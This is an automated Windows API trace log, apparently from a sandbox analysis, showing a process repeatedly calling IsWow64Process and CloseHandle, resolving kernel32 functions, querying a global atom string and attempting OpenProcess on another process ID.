	[0130.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.609] CloseHandle (hObject=0x2dc) returned 1
	[0130.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.609] CloseHandle (hObject=0x2dc) returned 1
	[0130.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.609] CloseHandle (hObject=0x2dc) returned 1
	[0130.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.609] CloseHandle (hObject=0x2dc) returned 1
	[0130.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.610] CloseHandle (hObject=0x2dc) returned 1
	[0130.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.610] CloseHandle (hObject=0x2dc) returned 1
	[0130.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.610] CloseHandle (hObject=0x2dc) returned 1
	[0130.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.610] CloseHandle (hObject=0x2dc) returned 1
	[0130.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.611] CloseHandle (hObject=0x2dc) returned 1
	[0130.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.611] CloseHandle (hObject=0x2dc) returned 1
	[0130.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.611] CloseHandle (hObject=0x2dc) returned 1
	[0130.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.611] CloseHandle (hObject=0x2dc) returned 1
	[0130.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.612] CloseHandle (hObject=0x2dc) returned 1
	[0130.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.612] CloseHandle (hObject=0x2dc) returned 1
	[0130.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.612] CloseHandle (hObject=0x2dc) returned 1
	[0130.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.612] CloseHandle (hObject=0x2dc) returned 1
	[0130.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.613] CloseHandle (hObject=0x2dc) returned 1
	[0130.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.613] CloseHandle (hObject=0x2dc) returned 1
	[0130.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.613] CloseHandle (hObject=0x2dc) returned 1
	[0130.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.613] CloseHandle (hObject=0x2dc) returned 1
	[0130.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.613] CloseHandle (hObject=0x2dc) returned 1
	[0130.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.614] CloseHandle (hObject=0x2dc) returned 1
	[0130.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.614] CloseHandle (hObject=0x2dc) returned 1
	[0130.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.614] CloseHandle (hObject=0x2dc) returned 1
	[0130.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.615] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.615] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.615] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.616] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.616] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.616] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.616] CloseHandle (hObject=0x2dc) returned 1
	[0130.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.616] CloseHandle (hObject=0x2dc) returned 1
	[0130.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.617] CloseHandle (hObject=0x2dc) returned 1
	[0130.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.617] CloseHandle (hObject=0x2dc) returned 1
	[0130.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.617] CloseHandle (hObject=0x2dc) returned 1
	[0130.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.617] CloseHandle (hObject=0x2dc) returned 1
	[0130.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.654] CloseHandle (hObject=0x2dc) returned 1
	[0130.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.655] CloseHandle (hObject=0x2dc) returned 1
	[0130.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.655] CloseHandle (hObject=0x2dc) returned 1
	[0130.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.655] CloseHandle (hObject=0x2dc) returned 1
	[0130.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.655] CloseHandle (hObject=0x2dc) returned 1
	[0130.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.656] CloseHandle (hObject=0x2dc) returned 1
	[0130.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.656] CloseHandle (hObject=0x2dc) returned 1
	[0130.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.656] CloseHandle (hObject=0x2dc) returned 1
	[0130.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.656] CloseHandle (hObject=0x2dc) returned 1
	[0130.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.657] CloseHandle (hObject=0x2dc) returned 1
	[0130.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.657] CloseHandle (hObject=0x2dc) returned 1
	[0130.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.657] CloseHandle (hObject=0x2dc) returned 1
	[0130.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.657] CloseHandle (hObject=0x2dc) returned 1
	[0130.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.658] CloseHandle (hObject=0x2dc) returned 1
	[0130.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.658] CloseHandle (hObject=0x2dc) returned 1
	[0130.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.658] CloseHandle (hObject=0x2dc) returned 1
	[0130.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.658] CloseHandle (hObject=0x2dc) returned 1
	[0130.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.658] CloseHandle (hObject=0x2dc) returned 1
	[0130.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.659] CloseHandle (hObject=0x2dc) returned 1
	[0130.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.659] CloseHandle (hObject=0x2dc) returned 1
	[0130.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.659] CloseHandle (hObject=0x2dc) returned 1
	[0130.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.659] CloseHandle (hObject=0x2dc) returned 1
	[0130.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.660] CloseHandle (hObject=0x2dc) returned 1
	[0130.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.660] CloseHandle (hObject=0x2dc) returned 1
	[0130.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.660] CloseHandle (hObject=0x2dc) returned 1
	[0130.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.660] CloseHandle (hObject=0x2dc) returned 1
	[0130.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.661] CloseHandle (hObject=0x2dc) returned 1
	[0130.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.661] CloseHandle (hObject=0x2dc) returned 1
	[0130.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.661] CloseHandle (hObject=0x2dc) returned 1
	[0130.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.661] CloseHandle (hObject=0x2dc) returned 1
	[0130.662] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.662] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.662] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.662] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.663] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.663] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.663] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.663] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.663] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.663] CloseHandle (hObject=0x2dc) returned 1
	[0130.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.664] CloseHandle (hObject=0x2dc) returned 1
	[0130.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.664] CloseHandle (hObject=0x2dc) returned 1
	[0130.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.664] CloseHandle (hObject=0x2dc) returned 1
	[0130.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.664] CloseHandle (hObject=0x2dc) returned 1
	[0130.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.665] CloseHandle (hObject=0x2dc) returned 1
	[0130.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.697] CloseHandle (hObject=0x2dc) returned 1
	[0130.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.697] CloseHandle (hObject=0x2dc) returned 1
	[0130.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.697] CloseHandle (hObject=0x2dc) returned 1
	[0130.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.697] CloseHandle (hObject=0x2dc) returned 1
	[0130.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.698] CloseHandle (hObject=0x2dc) returned 1
	[0130.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.698] CloseHandle (hObject=0x2dc) returned 1
	[0130.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.698] CloseHandle (hObject=0x2dc) returned 1
	[0130.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.698] CloseHandle (hObject=0x2dc) returned 1
	[0130.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.699] CloseHandle (hObject=0x2dc) returned 1
	[0130.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.699] CloseHandle (hObject=0x2dc) returned 1
	[0130.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.699] CloseHandle (hObject=0x2dc) returned 1
	[0130.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.699] CloseHandle (hObject=0x2dc) returned 1
	[0130.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.700] CloseHandle (hObject=0x2dc) returned 1
	[0130.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.700] CloseHandle (hObject=0x2dc) returned 1
	[0130.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.700] CloseHandle (hObject=0x2dc) returned 1
	[0130.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.700] CloseHandle (hObject=0x2dc) returned 1
	[0130.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.701] CloseHandle (hObject=0x2dc) returned 1
	[0130.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.701] CloseHandle (hObject=0x2dc) returned 1
	[0130.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.701] CloseHandle (hObject=0x2dc) returned 1
	[0130.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.701] CloseHandle (hObject=0x2dc) returned 1
	[0130.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.701] CloseHandle (hObject=0x2dc) returned 1
	[0130.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.702] CloseHandle (hObject=0x2dc) returned 1
	[0130.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.702] CloseHandle (hObject=0x2dc) returned 1
	[0130.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.702] CloseHandle (hObject=0x2dc) returned 1
	[0130.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.702] CloseHandle (hObject=0x2dc) returned 1
	[0130.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.703] CloseHandle (hObject=0x2dc) returned 1
	[0130.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.703] CloseHandle (hObject=0x2dc) returned 1
	[0130.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.703] CloseHandle (hObject=0x2dc) returned 1
	[0130.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.704] CloseHandle (hObject=0x2dc) returned 1
	[0130.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.704] CloseHandle (hObject=0x2dc) returned 1
	[0130.704] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.704] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.704] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.705] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.705] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.705] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.705] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.705] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.705] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.706] CloseHandle (hObject=0x2dc) returned 1
	[0130.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.706] CloseHandle (hObject=0x2dc) returned 1
	[0130.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.706] CloseHandle (hObject=0x2dc) returned 1
	[0130.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.706] CloseHandle (hObject=0x2dc) returned 1
	[0130.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.707] CloseHandle (hObject=0x2dc) returned 1
	[0130.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.707] CloseHandle (hObject=0x2dc) returned 1
	[0130.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.740] CloseHandle (hObject=0x2dc) returned 1
	[0130.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.740] CloseHandle (hObject=0x2dc) returned 1
	[0130.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.740] CloseHandle (hObject=0x2dc) returned 1
	[0130.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.740] CloseHandle (hObject=0x2dc) returned 1
	[0130.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.740] CloseHandle (hObject=0x2dc) returned 1
	[0130.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.741] CloseHandle (hObject=0x2dc) returned 1
	[0130.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.741] CloseHandle (hObject=0x2dc) returned 1
	[0130.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.741] CloseHandle (hObject=0x2dc) returned 1
	[0130.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.741] CloseHandle (hObject=0x2dc) returned 1
	[0130.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.742] CloseHandle (hObject=0x2dc) returned 1
	[0130.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.742] CloseHandle (hObject=0x2dc) returned 1
	[0130.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.742] CloseHandle (hObject=0x2dc) returned 1
	[0130.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.743] CloseHandle (hObject=0x2dc) returned 1
	[0130.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.743] CloseHandle (hObject=0x2dc) returned 1
	[0130.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.743] CloseHandle (hObject=0x2dc) returned 1
	[0130.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.743] CloseHandle (hObject=0x2dc) returned 1
	[0130.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.744] CloseHandle (hObject=0x2dc) returned 1
	[0130.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.744] CloseHandle (hObject=0x2dc) returned 1
	[0130.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.744] CloseHandle (hObject=0x2dc) returned 1
	[0130.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.744] CloseHandle (hObject=0x2dc) returned 1
	[0130.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.745] CloseHandle (hObject=0x2dc) returned 1
	[0130.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.745] CloseHandle (hObject=0x2dc) returned 1
	[0130.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.745] CloseHandle (hObject=0x2dc) returned 1
	[0130.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.745] CloseHandle (hObject=0x2dc) returned 1
	[0130.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.746] CloseHandle (hObject=0x2dc) returned 1
	[0130.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.746] CloseHandle (hObject=0x2dc) returned 1
	[0130.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.746] CloseHandle (hObject=0x2dc) returned 1
	[0130.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.746] CloseHandle (hObject=0x2dc) returned 1
	[0130.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.747] CloseHandle (hObject=0x2dc) returned 1
	[0130.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.747] CloseHandle (hObject=0x2dc) returned 1
	[0130.747] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.747] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.747] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.748] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.748] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.748] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.748] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.749] CloseHandle (hObject=0x2dc) returned 1
	[0130.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.749] CloseHandle (hObject=0x2dc) returned 1
	[0130.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.749] CloseHandle (hObject=0x2dc) returned 1
	[0130.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.749] CloseHandle (hObject=0x2dc) returned 1
	[0130.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.750] CloseHandle (hObject=0x2dc) returned 1
	[0130.750] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.750] CloseHandle (hObject=0x2dc) returned 1
	[0130.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.783] CloseHandle (hObject=0x2dc) returned 1
